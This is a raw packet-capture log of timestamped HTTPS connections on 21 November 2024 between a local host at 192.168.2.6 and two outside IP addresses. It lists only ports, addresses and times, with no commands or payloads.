Nov 21, 2024 09:54:04.424910069 CET	49813	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:04.425077915 CET	49813	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:04.425102949 CET	443	49813	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:05.518973112 CET	49814	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:05.519026041 CET	443	49814	40.113.110.67	192.168.2.6
Nov 21, 2024 09:54:05.519179106 CET	49814	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:05.519968987 CET	49814	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:05.519984007 CET	443	49814	40.113.110.67	192.168.2.6
Nov 21, 2024 09:54:05.562427044 CET	443	49809	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:05.563724995 CET	49809	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:05.563761950 CET	443	49809	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:05.564116001 CET	49809	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:05.564130068 CET	443	49809	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:05.705831051 CET	443	49810	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:05.706311941 CET	49810	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:05.706329107 CET	443	49810	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:05.706702948 CET	49810	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:05.706722021 CET	443	49810	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:05.809012890 CET	443	49811	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:05.809588909 CET	49811	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:05.809607983 CET	443	49811	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:05.810264111 CET	49811	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:05.810267925 CET	443	49811	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.005171061 CET	443	49809	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.005275965 CET	443	49809	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.005373955 CET	49809	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.008913994 CET	49809	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.008933067 CET	443	49809	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.008944035 CET	49809	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.008949995 CET	443	49809	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.013942957 CET	49815	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.014045000 CET	443	49815	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.014118910 CET	49815	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.017306089 CET	49815	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.017338037 CET	443	49815	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.135283947 CET	443	49812	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.138422966 CET	49812	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.138451099 CET	443	49812	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.139010906 CET	49812	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.139017105 CET	443	49812	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.140983105 CET	443	49810	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.141129017 CET	443	49810	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.141199112 CET	49810	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.141467094 CET	49810	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.141467094 CET	49810	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.141491890 CET	443	49810	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.141505003 CET	443	49810	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.144913912 CET	49816	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.145009041 CET	443	49816	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.145087957 CET	49816	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.145289898 CET	49816	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.145308971 CET	443	49816	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.213253975 CET	443	49813	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.214160919 CET	49813	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.214231968 CET	443	49813	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.214575052 CET	49813	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.214590073 CET	443	49813	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.250782013 CET	443	49811	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.250844955 CET	443	49811	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.251511097 CET	49811	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.251511097 CET	49811	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.251511097 CET	49811	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.254383087 CET	49817	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.254436970 CET	443	49817	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.254549980 CET	49817	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.254751921 CET	49817	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.254764080 CET	443	49817	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.555636883 CET	49811	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.555671930 CET	443	49811	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.570348978 CET	443	49812	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.570427895 CET	443	49812	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.570493937 CET	49812	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.570745945 CET	49812	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.570759058 CET	443	49812	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.570785046 CET	49812	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.570790052 CET	443	49812	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.573355913 CET	49818	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.573401928 CET	443	49818	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.573492050 CET	49818	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.573594093 CET	49818	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.573601961 CET	443	49818	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.657129049 CET	443	49813	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.657210112 CET	443	49813	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.657318115 CET	49813	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.657449961 CET	49813	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.657468081 CET	443	49813	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.657480955 CET	49813	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.657486916 CET	443	49813	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.659982920 CET	49819	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.660026073 CET	443	49819	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:06.660109043 CET	49819	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.660418034 CET	49819	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:06.660434008 CET	443	49819	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:07.469548941 CET	443	49814	40.113.110.67	192.168.2.6
Nov 21, 2024 09:54:07.469665051 CET	49814	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:07.471913099 CET	49814	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:07.471923113 CET	443	49814	40.113.110.67	192.168.2.6
Nov 21, 2024 09:54:07.472695112 CET	443	49814	40.113.110.67	192.168.2.6
Nov 21, 2024 09:54:07.474649906 CET	49814	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:07.474716902 CET	49814	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:07.474720955 CET	443	49814	40.113.110.67	192.168.2.6
Nov 21, 2024 09:54:07.474869013 CET	49814	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:07.519339085 CET	443	49814	40.113.110.67	192.168.2.6
Nov 21, 2024 09:54:07.841406107 CET	443	49815	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:07.841938019 CET	49815	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:07.841968060 CET	443	49815	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:07.842408895 CET	49815	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:07.842413902 CET	443	49815	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:07.869065046 CET	443	49816	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:07.869575024 CET	49816	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:07.869597912 CET	443	49816	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:07.869997978 CET	49816	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:07.870009899 CET	443	49816	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:07.983890057 CET	443	49814	40.113.110.67	192.168.2.6
Nov 21, 2024 09:54:07.983975887 CET	443	49814	40.113.110.67	192.168.2.6
Nov 21, 2024 09:54:07.984062910 CET	49814	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:07.984188080 CET	49814	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:54:07.984201908 CET	443	49814	40.113.110.67	192.168.2.6
Nov 21, 2024 09:54:08.035484076 CET	443	49817	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.035959005 CET	49817	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.035981894 CET	443	49817	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.036406994 CET	49817	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.036416054 CET	443	49817	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.294301033 CET	443	49815	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.294466019 CET	443	49815	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.294550896 CET	49815	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.294661045 CET	49815	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.294704914 CET	443	49815	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.294732094 CET	49815	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.294748068 CET	443	49815	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.297698975 CET	49820	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.297755003 CET	443	49820	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.297832966 CET	49820	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.298003912 CET	49820	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.298018932 CET	443	49820	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.303925037 CET	443	49816	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.304086924 CET	443	49816	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.304177999 CET	49816	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.304227114 CET	49816	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.304227114 CET	49816	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.304260969 CET	443	49816	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.304286003 CET	443	49816	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.307557106 CET	49821	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.307668924 CET	443	49821	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.307760000 CET	49821	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.308036089 CET	49821	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.308064938 CET	443	49821	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.428400040 CET	443	49818	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.428982019 CET	49818	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.429027081 CET	443	49818	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.429423094 CET	49818	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.429436922 CET	443	49818	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.440774918 CET	443	49819	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.441211939 CET	49819	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.441231966 CET	443	49819	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.441553116 CET	49819	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.441560030 CET	443	49819	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.479068041 CET	443	49817	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.479243040 CET	443	49817	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.479310036 CET	49817	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.480701923 CET	49817	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.480717897 CET	443	49817	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.484378099 CET	49822	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.484421968 CET	443	49822	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.484508991 CET	49822	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.484977961 CET	49822	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.484993935 CET	443	49822	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.880645037 CET	443	49818	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.880733013 CET	443	49818	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.880923033 CET	49818	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.881012917 CET	49818	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.881012917 CET	49818	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.881062031 CET	443	49818	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.881093979 CET	443	49818	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.883903980 CET	49823	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.883933067 CET	443	49819	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.884011030 CET	443	49823	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.884108067 CET	49823	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.884109020 CET	443	49819	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.884174109 CET	49819	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.884243011 CET	49823	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.884278059 CET	443	49823	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.884432077 CET	49819	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.884432077 CET	49819	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.884460926 CET	443	49819	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.884471893 CET	443	49819	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.888016939 CET	49824	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.888070107 CET	443	49824	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:08.888190985 CET	49824	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.888309002 CET	49824	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:08.888348103 CET	443	49824	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.085006952 CET	443	49820	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.085463047 CET	49820	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.085494041 CET	443	49820	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.085863113 CET	49820	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.085867882 CET	443	49820	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.133836031 CET	443	49821	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.134251118 CET	49821	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.134346962 CET	443	49821	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.134712934 CET	49821	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.134728909 CET	443	49821	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.334903002 CET	443	49822	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.335587978 CET	49822	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.335656881 CET	443	49822	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.336257935 CET	49822	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.336265087 CET	443	49822	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.527551889 CET	443	49820	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.527733088 CET	443	49820	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.527932882 CET	49820	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.528209925 CET	49820	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.528244019 CET	443	49820	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.528258085 CET	49820	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.528265953 CET	443	49820	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.558660984 CET	49825	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.558765888 CET	443	49825	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.558856010 CET	49825	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.562199116 CET	49825	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.562237978 CET	443	49825	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.576419115 CET	443	49821	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.576484919 CET	443	49821	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.576564074 CET	49821	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.577752113 CET	49821	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.577752113 CET	49821	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.577800989 CET	443	49821	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.577841043 CET	443	49821	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.641697884 CET	49826	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.641727924 CET	443	49826	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.641784906 CET	49826	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.656039000 CET	49826	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.656050920 CET	443	49826	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.666692019 CET	443	49823	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.667104006 CET	49823	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.667171001 CET	443	49823	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.667578936 CET	49823	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.667593956 CET	443	49823	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.778989077 CET	443	49824	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.779468060 CET	49824	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.779484987 CET	443	49824	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.779849052 CET	49824	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.779854059 CET	443	49824	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.787852049 CET	443	49822	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.788006067 CET	443	49822	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.788181067 CET	49822	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.788213968 CET	49822	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.788230896 CET	443	49822	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.788243055 CET	49822	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.788249016 CET	443	49822	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.791039944 CET	49827	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.791127920 CET	443	49827	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:10.791193962 CET	49827	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.791351080 CET	49827	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:10.791372061 CET	443	49827	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:11.111550093 CET	443	49823	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:11.111613035 CET	443	49823	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:11.111675978 CET	49823	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:11.111836910 CET	49823	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:11.111864090 CET	443	49823	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:11.111880064 CET	49823	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:11.111886978 CET	443	49823	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:11.114696026 CET	49828	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:11.114729881 CET	443	49828	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:11.114789963 CET	49828	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:11.114937067 CET	49828	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:11.114949942 CET	443	49828	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:11.230523109 CET	443	49824	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:11.230696917 CET	443	49824	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:11.230772018 CET	49824	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:11.230835915 CET	49824	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:11.230835915 CET	49824	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:11.230850935 CET	443	49824	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:11.230859041 CET	443	49824	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:11.233311892 CET	49829	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:11.233385086 CET	443	49829	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:11.233448982 CET	49829	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:11.233581066 CET	49829	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:11.233599901 CET	443	49829	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.356061935 CET	443	49825	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.358730078 CET	49825	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.358783960 CET	443	49825	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.359252930 CET	49825	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.359266996 CET	443	49825	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.448565006 CET	443	49826	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.449115038 CET	49826	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.449125051 CET	443	49826	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.450063944 CET	49826	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.450068951 CET	443	49826	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.636547089 CET	443	49827	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.636980057 CET	49827	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.637017965 CET	443	49827	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.637486935 CET	49827	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.637496948 CET	443	49827	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.799221039 CET	443	49825	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.799299002 CET	443	49825	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.799355030 CET	49825	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.799562931 CET	49825	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.799578905 CET	443	49825	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.799591064 CET	49825	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.799597025 CET	443	49825	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.802517891 CET	49830	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.802548885 CET	443	49830	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.802761078 CET	49830	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.802761078 CET	49830	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.802784920 CET	443	49830	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.892632961 CET	443	49826	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.892731905 CET	443	49826	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.892795086 CET	49826	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.893071890 CET	49826	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.893071890 CET	49826	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.893084049 CET	443	49826	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.893094063 CET	443	49826	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.895724058 CET	49831	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.895780087 CET	443	49831	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.895971060 CET	49831	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.896104097 CET	49831	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.896119118 CET	443	49831	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.901665926 CET	443	49828	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.902038097 CET	49828	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.902061939 CET	443	49828	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.902530909 CET	49828	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.902535915 CET	443	49828	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.951534986 CET	443	49829	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.956691980 CET	49829	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.956717014 CET	443	49829	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:12.995464087 CET	49829	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:12.995501995 CET	443	49829	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:13.092580080 CET	443	49827	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:13.092741013 CET	443	49827	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:13.092863083 CET	49827	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:13.095182896 CET	49827	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:13.095235109 CET	443	49827	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:13.095267057 CET	49827	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:13.095283031 CET	443	49827	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:13.130285025 CET	49832	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:13.130359888 CET	443	49832	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:13.130434990 CET	49832	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:13.133614063 CET	49832	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:13.133651972 CET	443	49832	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:13.347716093 CET	443	49828	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:13.347793102 CET	443	49828	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:13.347851992 CET	49828	443	192.168.2.6	13.107.246.45
